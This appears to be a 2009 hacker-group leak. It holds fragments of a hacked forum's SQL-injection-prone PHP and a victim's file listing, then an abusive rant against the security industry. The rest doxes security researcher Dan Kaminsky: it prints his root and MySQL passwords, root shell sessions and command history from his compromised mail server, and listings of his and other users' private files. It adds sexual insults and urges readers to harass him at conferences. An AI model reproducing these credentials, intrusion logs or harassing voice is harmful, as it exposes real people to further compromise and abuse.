if(mysql_num_rows($sql) >0) {
    session_start();
    $_SESSION['login'] = 1;
    while($m=mysql_fetch_array($sql)) {
        $_SESSION['username'] = encode($m['user']);
?>
(!) continue to forum, click here.
";
} else {
    echo '
(!) Ooooops! I guess that login doesn\'t work.


';
}
} elseif($_REQUEST['f']) {
    $cid = explode('|',$_REQUEST['f'],7);
    $id = (int) $cid[1];
    if($_SESSION['login']) {
?>

« back to forum list

(new)'; } else { $new = ""; } } ?>
Subject Posts By Last Post
« back to forum list

|<|\'|\"|java|xss|%3C|%3E)/i", $avz)){ $av = 'hacked.gif'; } elseif (file_exists('avatars/'.escapeshellcmd($avz))) { $av = $avz; } else { $av = 'hacked.gif'; } ?> |<|\'|\"|java|xss|%3C|%3E)/i", $avz)){ $av = 'hacked.gif'; } elseif (file_exists('avatars/'.$avx)) { $av = $avz; } else { $av = 'hacked.gif'; } ?>

Started by: on:
"; } else { echo ""; } ?>
'. rplace(stripslashes($dz)) .'
'; } ?>

"; } else { echo ""; } ?>
on:
'. rplace(stripslashes($dz)) .'
'; } ?>

Reply
bbcode: [url=url]text[/url] - [b][/b] [i][/i] [u][/u] [s][/s] [hr] [code][/code] [sub][/sub]


(!) please login to post.
";
    }
} else {
    function NT($num) {
        $sql = mysql_query("select * from topics where catid = '".$num."'");
        return mysql_num_rows($sql);
    }
    function PT($num) {
        $sql = mysql_query("select * from posts where sid = '".$num."'");
        if(mysql_num_rows($sql) >0) {
            $cf = (mysql_num_rows($sql) + 1);
        } else {
            $cf = '0';
        }
        return $cf;
    }
    function posts($num) {
        $n = ':'.$num;
        $sqlx = mysql_query("select * from users where unreadtopic LIKE '%".$n."' and user = '".$_SESSION['username']."'");
        while($a= mysql_fetch_array($sqlx)){
            echo '(new)';
        }
    }
    # init session
    $_SESSION['gid'] = hex(unique());
    $guid = $_SESSION['gid'];
?>

FORUM

Threads Posts

General hacking
Everything that applies to hacking
News
Important news about hacking or security.
Webapplication hacking
Everything webapplication, hacking websites, apps and more...
Network hacking
Strictly hardcore network.
SQL Injection
Vectors, questions and answers about SQL injection.
XSS
Vectors, questions and answers about cross site scripting.
CSRF
Unauthorized requests, CSRF, and general sea surfing.
Browser hacking
Hacking browsers, destroying browsers, and other browser mayhem.
Lifestyle
The hacker lifestyle, mind hacking, the way of life.
Software hacking
Got some cool software hacks? post them here.
Hardware hacking
We hack, hack, hack. So also computers, and other property.
Chillin
Just chill and relax a bit...
Tutorials
Posted tutorials, links to them and Q & A
Trashbin
Rubbish and spam.

Casual file listing...

-rwx------ 1 ronald ronald 2629 2009-01-23 17:21 125x125freexssa.gif
-rwx------ 1 ronald ronald 2250 2009-01-23 17:21 1338.gif
-rwx------ 1 ronald ronald 1645 2009-01-23 17:22 about.php
-rwx------ 1 ronald ronald 4374 2009-01-23 17:22 archive.php
-rwx------ 1 ronald ronald 4849 2009-01-23 17:21 arioso.js
-rwx------ 1 ronald ronald 15616 2009-01-23 17:21 ascii.html
drwx------ 2 ronald ronald 65536 2009-01-23 17:22 avatars
drwx------ 2 ronald ronald 8192 2009-01-23 17:22 cache
-rwx------ 1 ronald ronald 3957 2009-01-23 17:21 cap.php
-rwx------ 1 ronald ronald 561 2009-01-23 17:22 contact.php
drwx------ 2 ronald ronald 8192 2009-01-23 17:21 css
-rwx------ 1 ronald ronald 209 2009-01-23 17:21 dx.php
-rwx------ 1 ronald ronald 2515 2009-01-23 17:21 err.php
-rwx------ 1 ronald ronald 118 2009-01-23 17:21 favicon.ico
-rwx------ 1 ronald ronald 197 2009-01-23 17:21 fav.php
-rwx------ 1 ronald ronald 34228 2009-01-23 17:21 forumasas.php
-rwx------ 1 ronald ronald 7988 2009-01-23 17:21 fuzzy_overdrive.txt
-rwx------ 1 ronald ronald 712 2009-01-23 17:21 google.php
-rwx------ 1 ronald ronald 4889 2009-01-23 17:21 Hostscanner.phps
-rwx------ 1 ronald ronald 1513 2009-01-23 17:21 .htaccess
-rwx------ 1 ronald ronald 1412557 2009-01-23 17:21 icon.txt
drwx------ 3 ronald ronald 16384 2009-01-23 17:22 images
drwx------ 2 ronald ronald 8192 2009-01-23 17:22 include
-rwx------ 1 ronald ronald 5739 2009-01-23 17:21 index2sssdsdw.php
-rwx------ 1 ronald ronald 4194 2009-01-23 17:21 index.php
-rwx------ 1 ronald ronald 6204 2009-01-23 17:21 index_pig.php
drwx------ 2 ronald ronald 8192 2009-01-23 17:21 js
-rwx------ 1 ronald ronald 5333 2009-01-23 17:21 linkdumpssdsw.php
-rwx------ 1 ronald ronald 570 2009-01-23 17:21 log.html
-rwx------ 1 ronald ronald 4631 2009-01-23 17:22 logo.gif
-rwx------ 1 ronald ronald 3449 2009-01-23 17:22 logo_over.gif
-rwx------ 1 ronald ronald 7612 2009-01-23 17:21 logo.png
-rwx------ 1 ronald ronald 1712 2009-01-23 17:21 no.gif
-rwx------ 1 ronald ronald 77020 2009-01-23 17:21 NYF.jpg
drwx------ 3 ronald ronald 8192 2009-01-23 17:21 od
-rwx------ 1 ronald ronald 1189 2009-01-23 17:21 phpPOP3bruteforcer.phps
-rwx------ 1 ronald ronald 1223 2009-01-23 17:21 phpTORwrapper.phps
drwx------ 2 ronald ronald 8192 2009-01-23 17:21 plesk-stat
-rwx------ 1 ronald ronald 8641 2009-01-23 17:21 plopper.gif
-rwx------ 1 ronald ronald 9298 2009-01-23 17:21 plopper.rar
-rwx------ 1 ronald ronald 4326 2009-01-23 17:21 registersddsw.php
-rwx------ 1 ronald ronald 2192 2009-01-23 17:21 remoteSQLhashExtracter.phps
-rwx------ 1 ronald ronald 0 2009-01-23 17:22 robots.txt
-rwx------ 1 ronald ronald 774 2009-01-23 17:21 rss.php
-rwx------ 1 ronald ronald 12994 2009-01-23 17:21 secure_coding_map.png
drwx------ 2 ronald ronald 8192 2009-01-23 17:21 smiles
-rwx------ 1 ronald ronald 6767 2009-01-23 17:22 sn00per.phps
-rwx------ 1 ronald ronald 204 2009-01-23 17:21 sop2.html
-rwx------ 1 ronald ronald 1036 2009-01-23 17:21 sop.html
-rwx------ 1 ronald ronald 2001 2009-01-23 17:22 stats.php
-rwx------ 1 ronald ronald 989 2009-01-23 17:21 style.css
-rwx------ 1 ronald ronald 74209 2009-01-23 17:22 suigenchi.rar
-rwx------ 1 ronald ronald 14709 2009-01-23 17:21 thw.gif
-rwx------ 1 ronald ronald 2035 2009-01-23 17:22 tools.php
-rwx------ 1 ronald ronald 39048 2009-01-23 17:22 TorSniff.phps
drwx------ 3 ronald ronald 8192 2009-01-23 17:22 webappsec
drwx------ 2 ronald ronald 8192 2009-07-15 12:27 x

Again, we could drop the database and users but there is no need, this is old material but fun material :)

Ronald said he'd had enough of security a while back, he had many wannabes who worshipped him. He probably got to the stage at which he realised that what he did does not require much intelligence. When you realise that and you have people worshipping you - you get to wondering how dumb some of these people are, and hence the security industry is.
Ronald got to that point despite lacking much security talent himself (see above) and focusing on just web security. Credit to you for sticking to your guns and walking away Ronald, one thing is for sure, there is more class in your slightly stretched (im sure) dutch asshole than there is in Jeremiah Grossman and rsnake's brains. | \ / _\/_ Industry check .-'-. //o\ _\/_ -- / \ -- | /o\\ ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~` We don't talk to police | We don't make a peace bond The security scene is fucked. You have Dan Kaminsky lecturing you on how DNS poisoning will destroy life as we know it. You have Matasano harvesting talent and critiquing everyone, and then Ptacek can only announce the release of....a graphical firewall management client. There's kingcope killing bugs and dropping weaponized exploits while making no other contribution except putting a smile on the face of kiddies. There's iDefense and their competitors selling exploits and only doing research in how to make more exploits. There's Jeff Moss running a conference under the hideous misnomer "Blackhat Briefings" where the same researchers search for glory and present the same shit year after year. There are people who just live press release by press release. And on top of it all, somehow you STILL have not got rid of Kevin Mitnick. The industry cares about virtualization one year and iPhones the next, every year forgetting the lessons it should have picked up in the last. If you are just someone looking to pay a fair price to not get owned, you find out quickly that none of these people exist to help you. Very few people in this industry have their income model based around actually making you more secure. At best, some of them have it based around convincing you that you are better off. The very concept of "penetration testing" is fundamentally flawed. 
The problem with it is that the penetration tester has a limited set of targets they're allowed to attack, while a real attacker can attack anything in order to gain access to the site/box. So if a site on a shared host is being tested, just because site1.com is "secure" that does NOT in any way mean that the server is secure, because site2.com could easily be vulnerable to all sorts of simple attacks.

The time constraint is another problem. A professional pentester with a week or two to spend on a client's network may or may not get into everything. A real dedicated hacker making the slog who spends a month of eight hour days WILL get into anything they target. You're lucky if it even takes him that long, really.

Those things should all be very obvious, but whitehats still make the mistake of discounting them. Look at Mitnick. Every time he gets owned he blames his host or his DNS provider. If he's getting owned through them, that's still his fault. Choosing a host is a security decision, it's just like choosing a password. If you choose a weak one you expose yourself. It's still your fault.

It's the same with outsourcing the development of your security-critical code. Mitnick could get someone else to make him a flashy website, and then blame them when it is full of file include vulnerabilities. People do this all the time, indirectly, by using ridiculous CMS or blog software. As an easy example, look at Wordpress. Even easier, look at Wordpress in 2007. Horrid. When considering Wordpress, a blackhat starts reading the PHP, shudders and giggles, and then laughs at the idea of ever using it on one of their servers. A whitehat never gets that far apparently, they just install it and get owned.

I simply fail to see how leading security researchers run all kinds of code that is blatantly dangerous. Are they really that bad at reading code? Or do they just not care much if their passwords end up on Full Disclosure? If it's the second option, why is that? Why can these people make a living selling security when they make such bad choices? How do they maintain legitimacy? They take less responsibility for getting owned than do the people who they sell services to. There's a popular term for people who don't read code. We call them script kiddies.

You cannot outsource blame. You HAVE to take responsibility for your mistakes, whether they are mistakes in your code, mistakes in code you are using, mistakes by your host, or mistakes in who you trust. These are all security choices. Learn to control this shit. Learn how to read code. A lot of the time it only takes a very shallow audit to realise that the code is crap and is bound to have bugs.

In a smarter world, security professionals get paid to stop people from getting owned. End of. There is no limit to the scope of an audit. Are you professional types really this out of touch? I see all these papers about how to protect yourself from these super-fucking-advanced techniques and exploits that very few people can actually develop, and most hackers will NEVER USE. It's the simple stuff that works now, and will continue to work years into the future. Not only is it way easier to dev for simple mistakes, but they are easier to find and are more plentiful.

The whole concept of full-disclosure has backfired. It will never work. It's some slashdot hippie pipe dream. Even you dumbass corporate types should recognize this. If you're constantly giving away all the vulnerabilities you find, for *FREE* mind you (and what other industry does that?), and the vulnerabilities get harder and harder to find and exploit, it will get harder and harder for you all to do your "job". Frankly, I'm surprised that the non-disclosure movement didn't start in the security industry in the first place. In a way it did, by default. With full-disclosure, the security industry is all about show and gloat, it is not about fixing anything. A lot of bugs have been fixed from it, but it comes with the price of an industry that likes to cripple itself. Projects run by teams of trained monkeys are always eager to add more bugs to replace those that have been fixed.

We hate the industry because it is full of shit. There are so many trolls like Kaminsky who just desperately search for anything new, to get attention. So many talentless buffoons trying to scam the planet. A lot of the actual talent out there is severely misapplied. It's an industry tied to news and not results, because very few of you can even attain results. When you can't, who's the wiser? Your customers can hardly tell if you have really made them more secure or not. Sometimes there are superficial benefits, sometimes there aren't. How do you convince the customer that they are more ZF0-safe than before, if they were never targeted and probably never will be? And you all lack the legitimacy to really do the job you should anyways. We can only expose so many frauds, the rest of you can pretend you have changed something.

Very few whitehats actually go out there and provide a service where they make people more secure. Not just for a day or a month. Are you genuinely fixing the underlying design and logic flaws that generate security problems for your clients or customers? If you actually clean up every exposed security flaw they have, will they still be "secure" in six months or a year?

We could go on. Just in general, the industry is failing. Flat out failing. You cannot even protect yourselves.

| \ / _\/_ Dan Kaminsky .-'-.
//o\ _\/_ -- / \ -- | /o\\ ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~` Just as every cop is a criminal | And all the sinners saints As heads is tails Just call me Lucifer 'cause I'm in need of some restraint So if you meet me Have some courtesy Have some sympathy, and some taste Use all your well-learned politesse Or I'll lay your soul to waste !~~~~~~~~~~~~~~~~~~ Dan Kaminsky 0wned to Fuck ~~~~~~~~~~~~~~~~~~! !~~~~~~~~~~ Table of Contents ~~~~~~~~~~! 1. mail.doxpara.com 2. backend.doxpara.com 3. attacker.doxpara.com 4. www.doxpara.com 5. Select spools 2005-2009 6. Select gmail 7. Select twitter Dan Kaminsky is a noob. This guy does not know the first thing about security. His boxes were a crazy combination of half-updated shit, half- removed shit, half-installed shit, half-configured shit. The lack of things working properly actually blocked a bit of 0day. But Dan, do not go selling that as some kind of advanced defense - you provided us with plenty of local holes to exploit and root. Dan is a selfish jerkoff who is hated by the security industry and the underground alike. He's fat and ugly in a way that only Gadi Evron could love. Is that hairy ass picture yours or ccg's? Do we want to know? When Dan made a huge stink about DNS flaws about a year ago (July 2008) we knew we had to own him sooner or later. So we did. Him and his little whitehat bitch friends too. Dan cannot even administer a box, let alone preach security. He lacks all real legitimacy because he only hunts for flashy bugs that he can turn into a big story. This guy would be the least important character in any real security organization, the fatass past his prime (did Dan have a prime?) who obsesses over areas that no-one else wants to touch just so he can find a niche and avoid getting let go. 
spender puts this nicely: < dan_kam> LS -AL 0DAYZ/ < dan_kam> LS -AL 0DAYZ/ < spender> dns1.c < spender> dns2.c < spender> dns3.c < spender> dns4.c < spender> dns5.c < spender> dns6.c < spender> dns7.c < dan_kam> grsux.c < spender> dns8.c < spender> dns9.c < dan_kam> stab_spender.c We hacked Dan's assets first through finding bugs and writing 0day, and then through abusing him giving away passwords and his silly password scheme. Check out just some of his passes: fuck.hackers, 0hn0z (root account on his mail box), fuck.omg, fuck.vps, ohhai Five character root password? Niiiiiiice. From .mysql_history: SET PASSWORD FOR 'root'@'localhost' = PASSWORD('fuck.mysql'); See the pattern? Adding fuel to the fire (and hopefully flames to his talks!), Dan has a messy personal life involving him, his girlfriend, and other girls who he would love to get with. For once, we are mostly sparing the girlfriend. Who says chivalry is dead? But we'll still point out the dating torrents that Kaminsky downloads. Will people please troll Dan at BHB and Defcon? Basically anybody with the loosest affiliation to ZF0 doesn't want to do it for obvious reasons. So we need everyone else to. Ask questions. Ask him how he feels about being a security researcher while hackers can read his most private messages. While we can keep up on any "work" he is doing. While we can monitor whitehat communications through individual emails and mailing lists that he is a part of. How we've read every emo conversation between him and ccg. Ask him what the fuck he is doing standing before you as a lecturer. Remember, anyone *not* trolling Dan must be ZF0. You don't want to be accused of such a thing, do you? So put your hands up! The hax logs of Dan's bounces run about 8000 lines, so that's the number to skip if you don't want to read them. !~~~~~~~~~~ mail.doxpara.com ~~~~~~~~~~! 
Password:
Last login: Mon Jun 29 10:00:45 2009 from cpe-72-225-172-
FreeBSD 7.0-STABLE (GENERIC) #0: Mon Jul 28 18:18:06 PDT 2008

********************************************************************************
********************************************************************************
OS Update to BSD 7.0 is complete. Email is up, procmail is up. Apache and
MySQL are up and all websites seem to operating normally. Still patching
a few more apps but things are good to go....
********************************************************************************
********************************************************************************
Any questions, let me know (pmauvais at gmail.com).

%uname -a; id
FreeBSD livingend.org 7.0-STABLE FreeBSD 7.0-STABLE #0: Mon Jul 28 18:18:06 PDT 2008 psm at pmjm.com:/usr/obj/usr/src/sys/GENERIC i386
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
ls -al df -h ls backups/ ls spool/ ls db/ ls msgs/ vi /usr/local/etc/php.ini unalias vi vi /usr/local/etc/php.ini apachectl graceful ls cd /export/www/ ls ls -al mkdir coreynewmanphoto.com chown coreynewmanphoto.com dire chown dire coreynewmanphoto.com chmod -R 777 coreynewmanphoto.com/ cd coreynewmanphoto.com/ vi index.html vi /usr/local/etc/apache22/httpd.conf apachectl graceful cd /home/dire/ ls ls -al ln -s coreynewmanphoto.com /export/www/coreynewmanphoto.com/ ls -l cd /export/www/ ls ls -al cd - ln -s /export/www/coreynewmanphoto.com/ coreynewmanphoto.com ls -al cd /home ls cd karin/ ls cd /export/www/ ls nslookup dreamhost.com nslookup ns1.dreamhost.com nslookup ns2.dreamhost.com nslookup ns3.dreamhost.com cd /home ls ls /export/www/ cd /export/www/ cd co cd coreynewmanphoto.com/ ls scp -r * dire at professorx.dreamhost.com:coreynewmanphoto.com/ scp -r * dire at professorx.dreamhost.com: sftp dire at professorx.dreamhost.com ls ls -al rm coreynewmanphoto.com ls cd ../jayzendesigns.com/ ls cd ../johnzentner.com/ ls cd ../lovebugknits.com/ ls -al cd LoveBug\ Site_files/ ls cd .. 
ls tar cvf lovebug.tar LoveBug\ Site_files cd /home/andyw/ ls scp -r * andeverwash at professorx.dreamhost.com: vi /etc/mail/virtusertable unalias vi vi /etc/mail/virtusertable nslookup ns1.dreamhost.com nslookup ns2.dreamhost.com nslookup ns3.dreamhost.com cd /export/www/yourmom.sh ls scp -r * ehampshire at professorx.dreamhost.com:yourmom.sh/ cat ~/.ssh/id_dsa.pub scp -r * ehampshire at professorx.dreamhost.com:yourmom.sh/ cd ../ehampshire.com/ scp -r * ehampshire at professorx.dreamhost.com:ehampshire.com/ cd ../lovebugknits.com/ ls cd ../jayzendesigns.com/ ls scp -r * jaymi at professorx.dreamhost.com:jayzendesigns.com/ scp -r * jaymi at professorx.dreamhost.com:jayzendesigns.com/ scp -r * jaymi at professorx.dreamhost.com: sftp jaymi at professorx.dreamhost.com cd ../lovebugknits.com/ ls sftp jenicole at professorx.dreamhost.com cd /home/ciagon/public_html/ ls scp -r * ehampshire at professorx.dreamhost.com:yourmom.sh/ciagon/ cd ../../dante/pu cd ../../dante/ ls cd /export/www/norcalparties.com/ ls sftp jcrossley2 at professorx.dreamhost.com mysql -u root -pfuck.mysql mysql -u root -pfuck.mysql df -h cd /export/www/roomwithamoose.com/ ls mysqldump --opt -Q -uroot -p vbulletin > vbulletin_db.sql ls cd closet ls cd .. cd .. ls cd zim ls scp -r * ehampshire at professorx.dreamhost.com:roomwithamoose.com/ cd ../roomwithamoose.com ls vi index.php unalias vi cat index.php scp index.php ehampshire at professorx.dreamhost.com:roomwithamoose.com/ cd ../ehampshire.com/magic/ ls cd .. scp -r magic ehampshire at professorx.dreamhost.com:roomwithamoose.com/ top cd /export/www/roomwithamoose.com/ scp -r * ehampshire at professorx.dreamhost.com:roomwithamoose.com/ cd /export/www/policethepolice.com ls cd .. tar czvf policethepolice.com.tgz policethepolice.com ln -s policethepolice.com.tgz /home/dire/ cd /home/dire/ ls -l chmod 777 policethepolice.com.tgz rm policethepolice.com.tgz ln -s /export/www/policethepolice.com.tgz . 
ls -l chmod 777 policethepolice.com.tgz cd public_html/ ls cd /export/www/coreynewmanphoto.com/ ls cd ../policethepolice.com ls find . |grep counter cd .. ls cd zim ls cd ../yourmom.sh ls find . |grep counter vi index.php3 unalias vi vi index.php3 vi top.php3 vi bottom.php3 cd ../policethepolice.com ls vi index.php.orig vi index.php vi ../counter.php3 mysqladmin -h mysqladmin --help mysqldump -h mysqldump --help mysqldump -uroot -pfuck.mysql counter > /tmp/counter_db.sql vi /tmp/counter_db.sql mysql -u counter_db -p -h mysql.yourmom.sh yourmom_counter_db < /tmp/counter_db.sql mysql -u counter_db -p -h mysql.yourmom.sh yourmom_counter_db < /tmp/counter_db.sql mysql -u counter_db -p -h mysql.yourmom.sh yourmom_counter_db < /tmp/counter_db.sql scp /tmp/counter_db.sql ehampshire at professorx.dreamhost.com: fg cd .. cp counter.php3 /home/dire/ cd /home/jaymi/public_html/photos/ ls cd .. tar zcvf jaymi_photos.tgz photos/ cd /export/www/ mkdir colo.pmjm.com chmod 777 colo.pmjm.com/ cd colo. cd colo.pmjm.com/ vi index.html unalias vi vi index.html vi /usr/local/etc/apache22/httpd.conf cd /usr/local/www/ ls ls cd data/ ls cd .. vi index.html fg apachectl graceful cd /export/www/ ls vi /usr/local/etc/apache22/httpd.conf apachectl graceful cd colo.pmjm.com/ ln -s /home/jaymi/public_html/jaymi_photos.tgz . ls vi index.html nslookup photos.jayzendesigns.com nslookup jayzendesigns.com nslookup 67.205.60.48 nslookup 208.97.187.239 cd /export/www/johnzentner.com/ ls scp -r index.html jaymi at professorx.dreamhost.com:johnzentner.com/ scp -r images jaymi at professorx.dreamhost.com:johnzentner.com/ %ls -la total 1016 drwxr-xr-x 7 root wheel 1024 May 10 07:08 . drwxr-xr-x 22 root wheel 1024 May 5 20:47 .. 
-rw------- 1 root wheel 108 Sep 28 2006 .Xauthority -rw------- 1 root wheel 8791 Jun 29 06:47 .bash_history -rw-r--r-- 1 root wheel 789 Oct 3 2006 .bashrc drwxr-xr-x 5 root wheel 512 Sep 4 2007 .bittorrent -rw-r--r-- 2 root wheel 786 Jul 22 2008 .cshrc -rw------- 1 root wheel 2217 Jul 13 15:34 .history -rw-r--r-- 1 root wheel 143 Nov 3 2005 .k5login -rw------- 1 root wheel 174 Feb 17 16:02 .lesshst -rw-r--r-- 1 root wheel 293 Nov 3 2005 .login -rw------- 1 root wheel 1396 Sep 5 2008 .lsof_pmjm -rw------- 1 root wheel 5872 May 10 07:08 .mysql_history -rw-r--r-- 2 root wheel 253 Jul 22 2008 .profile -rw------- 1 root wheel 1024 Feb 17 16:05 .rnd drwx------ 2 root wheel 512 Nov 6 2008 .ssh -rw-r--r-- 1 root wheel 36086 Jul 24 2008 logo-thelivingend.gif drwx------ 2 root wheel 512 Oct 9 2006 mail -rw-r--r-- 1 root wheel 80 Jul 24 2008 modules.txt -rw-r--r-- 1 root wheel 25008 Jul 22 2008 pkgs -rw-r--r-- 1 root wheel 10380 Jul 22 2008 portmaster-list -rw-r--r-- 1 root wheel 45 Jul 22 2008 ports-byhand -rw-r--r-- 1 root wheel 811 Sep 14 2007 queue-by-email.pl -rw-r--r-- 1 root wheel 811 Sep 14 2007 queue-by-from.pl -rw-r--r-- 1 root wheel 815 Sep 14 2007 queue.pl -rw-r--r-- 1 root wheel 1565 Sep 14 2007 remove-queue-by-email.pl drwxr-xr-x 2 root wheel 512 Jul 9 2008 ventrilo_srv -rw-r--r-- 1 root wheel 148042 Nov 14 2008 ventrilo_srv-3.0.2-FreeBSD-i386.tar.gz -rw-r--r-- 1 root wheel 208458 May 29 2008 ventrilo_srv-3.0.2-Linux-i386.tar.gz drwxr-xr-x 2 500 500 512 Nov 19 2007 ventsrv %cat .ssh/*
%cd /home %ls -la total 144 drwxr-xr-x 33 root wheel 1024 Jul 13 14:24 . drwxr-xr-x 24 root wheel 512 Jul 23 2008 ..
drwxr-xr-x 3 admin admin 512 May 28 2004 admin drwxr-xr-x 8 andyw andy 1024 Sep 4 2006 andyw drwxr-xr-x 2 bmondala bmondala 512 Mar 20 2008 bmondala drwxr-xr-x 2 bre bre 512 Aug 19 2007 bre drwxr-xr-x 7 1016 ciagon 1024 Aug 21 2006 ciagon drwxr-xr-x 3 crystal crystal 512 Mar 21 09:33 crystal drwxr-xr-x 3 d d 512 May 10 12:11 d drwxr-xr-x 2 dakami dakami 512 May 10 11:57 dakami drwxr-xr-x 2 dante dante 512 May 21 2005 dante drwxr-xr-x 3 dire dire 512 May 11 09:39 dire drwxr-xr-x 2 dmktest dmktest 512 Apr 25 2006 dmktest drwx------ 68 effugas wheel 5120 Jul 17 11:43 effugas drwxr-xr-x 42 1009 effugas_nr 2560 Jun 29 12:26 effugas_nr drwxr-xr-x 6 ginray ginray 1024 Feb 11 2006 ginray drwxr-xr-x 4 gir wheel 512 Sep 1 2008 gir drwxr-xr-x 7 hampshir hampshir 512 Sep 14 2007 hampshir drwxr-xr-x 6 ice wheel 1024 Jul 17 09:18 ice drwxr-xr-x 3 jay jay 512 Aug 16 2006 jay drwxr-xr-x 3 jaymi jaymi 512 Nov 12 2008 jaymi drwxr-xr-x 6 mooseaccess jb 512 Apr 6 2004 jb drwxr-xr-x 7 jcrossley jcrossley 1024 Mar 2 09:30 jcrossley drwxr-xr-x 2 jeff jeff 512 May 12 2006 jeff drwxr-xr-x 3 jenicole jenicole 512 Jan 30 2008 jenicole drwxr-x--x 14 jmondala jmondala 2048 Jul 20 00:01 jmondala drwx------ 15 karin karin 1536 Apr 21 2008 karin drwxr-xr-x 2 mooseaccess wheel 512 Oct 7 2008 mooseaccess drwxr-xr-x 4 pig pig 512 May 9 14:59 pig drwxr-x--- 7 psm pmjm 1536 Jul 13 15:34 psm drwxr-xr-x 7 tom tom 1024 May 17 2006 tom drwxr-xr-x 3 tomstdenis tomstdenis 512 Feb 20 2006 tomstdenis drwxr-xr-x 4 ventrilo ventrilo 512 Nov 14 2008 ventrilo %cd effugas %ls -la total 7437192 -rw-r--r-- 1 effugas wheel 53 Mar 10 2005 +COMMENT -rw-r--r-- 1 effugas wheel 490 Mar 10 2005 +CONTENTS -rw-r--r-- 1 effugas wheel 307 Mar 10 2005 +DESC -r--r--r-- 1 effugas wheel 13080 Mar 10 2005 +MTREE_DIRS -rw-r--r-- 1 effugas wheel 1299747 Jul 16 2005 - -rw-r--r-- 1 effugas wheel 0 Sep 28 2005 -u drwx------ 68 effugas wheel 5120 Jul 17 11:43 . drwxr-xr-x 33 root wheel 1024 Jul 13 14:24 .. 
-rw------- 1 effugas wheel 434 Jan 13 2008 .Xauthority -rw-r--r-- 1 effugas wheel 0 Oct 24 2006 .addressbook -rw------- 1 effugas wheel 2285 Oct 24 2006 .addressbook.lu -rw------- 1 effugas wheel 12839 Jul 18 06:18 .bash_history drwxr-xr-x 7 effugas wheel 512 Jun 13 2008 .bittorrent drwxr-xr-x 6 effugas wheel 512 Feb 6 14:05 .cpan drwx------ 2 effugas wheel 512 Apr 23 2005 .elinks drwx------ 2 effugas jb 512 Sep 24 2005 .elm -rw-r--r-- 1 effugas wheel 63520 Sep 29 2005 .fonts.cache-1 drwx------ 4 effugas wheel 512 Feb 15 2006 .gaim drwx------ 2 effugas wheel 512 Mar 19 00:41 .gnupg -rw------- 1 effugas wheel 302298 Dec 30 2005 .grepmail-cache -rw------- 1 effugas wheel 67 Jul 6 2008 .lesshst -rw-r--r-- 1 effugas wheel 133 Jun 10 2006 .mailboxlist -rw------- 1 effugas wheel 7465 Jun 3 06:23 .mysql_history -rw------- 1 effugas wheel 221 Sep 10 2004 .nessusrc -rw-r--r-- 1 effugas wheel 28672 Sep 2 2004 .nomde_ex.pl.swo -rw-r--r-- 1 effugas wheel 16384 Sep 7 2004 .nomde_ex.pl.swp drwx------ 8 effugas wheel 512 Dec 5 2005 .openwebmail -rw------- 1 effugas wheel 1592 Apr 20 19:28 .pine-interrupted-mail -rw------- 1 effugas wheel 17165 Jul 17 11:38 .pinerc -rw-r--r-- 1 effugas wheel 816 Jan 8 2006 .procmailrc -rw------- 1 effugas wheel 1024 Jan 7 2009 .rnd -rw-r--r-- 1 effugas wheel 12 Apr 4 2005 .slirprc drwx------ 2 effugas wheel 512 Jul 12 14:02 .spamassassin drwxr-xr-x 2 effugas wheel 512 Nov 9 2005 .ssh drwxr-xr-x 3 effugas wheel 512 Jun 23 2007 .subversion -rw------- 1 effugas jb 256 Dec 5 2005 .vacation.msg drwxr-xr-x 2 effugas wheel 512 Sep 29 2005 .vnc -rw-r--r-- 1 effugas wheel 5714 Sep 5 2007 110eclipse.jpg -rw-r--r-- 1 effugas wheel 5714 Sep 5 2007 110eclipse.jpg.1 -rw-r--r-- 1 effugas wheel 4170702 Dec 17 2006 17-Day tripper.mp3 -rw-r--r-- 1 effugas wheel 18163 Oct 10 2006 399299 drwx------ 11 effugas wheel 2048 Jan 14 2007 4 -rw------- 1 effugas wheel 1244999 Jul 25 2005 Admin Noise -rwx------ 1 effugas wheel 19253 May 20 2007 Alpha Man Conversation & 
Persuasion.torrent drwxr-xr-x 7 effugas wheel 512 Jun 14 2008 BitTorrent Downloads drwxr-xr-x 11 root wheel 1024 Jan 13 2007 BitTorrent-4.20.9 -rw------- 1 effugas wheel 9215553 Aug 12 2006 CCCP -rw-r--r-- 1 effugas wheel 136192 Aug 12 2007 Cingular_Customized APN info and price sheet.doc -rw------- 1 effugas wheel 11072756 Sep 15 2006 Crypto -rwx------ 1 effugas wheel 18865 Nov 4 2006 David X Seduction and Relationships Seminar.torrent -rw-r--r-- 1 effugas wheel 64512 Jan 6 2006 DiogeNeS.doc -rw-r--r-- 1 effugas wheel 27648 May 10 13:01 Doxpara-NDT term sheet.doc -rw------- 1 effugas wheel 425406 Jul 25 2005 Drafts -rw-r--r-- 1 effugas wheel 27648 Aug 12 2007 Encryption sw_SecurStar info.doc lrwxr-xr-x 1 effugas wheel 29 Jan 8 2006 Funsec -> /usr/home/effugas/mail/Funsec -rw------- 1 effugas mail 10369669 Sep 25 2005 Gap -rw------- 1 effugas wheel 496 Sep 30 2005 INBOX.Drafts -rw------- 1 effugas wheel 324536 Nov 18 2005 INBOX.Sent -rw------- 1 effugas wheel 496 Sep 30 2005 INBOX.Trash -rwx------ 1 effugas wheel 20767 Oct 24 2006 Juggler - Charisma Arts Bootcamp.avi.torrent -rw-r--r-- 1 effugas wheel 403486571 Jul 13 2006 Junk -rw-r--r-- 1 effugas wheel 379402660 Nov 17 2005 Junk_toobig -rw------- 1 effugas wheel 280301055 Aug 21 2006 Known drwxr-xr-x 2 effugas wheel 512 Sep 26 2005 MT-3.2-en_US -rwx------ 1 effugas wheel 1377924 Sep 26 2005 MT-3.2.tar.gz drwxrwxrwx 2 effugas jb 512 Sep 24 2005 Mail -rw-r--r-- 1 effugas wheel 1438 Oct 4 2006 Makefile -rw------- 1 effugas wheel 229972323 Sep 21 2006 Older Mail -rw------- 1 effugas wheel 181797360 Jul 25 2005 Orig_Older -rw------- 1 effugas wheel 492 Jul 25 2005 Outbox -rw-r--r-- 1 effugas wheel 200578 Aug 12 2007 PhoneCrypt_docs_pc.pdf -rwx------ 1 effugas wheel 28554 Nov 18 2006 PickUp 101 - He Said, She Said - Volume 1.torrent drwxr-xr-x 2 effugas wheel 512 Oct 2 2005 PyFlickrUploadr -rw-r--r-- 1 effugas wheel 7164 Oct 2 2005 PyFlickrUploadr.tar.gz lrwxr-xr-x 1 effugas wheel 31 Jan 8 2006 RouteSec -> 
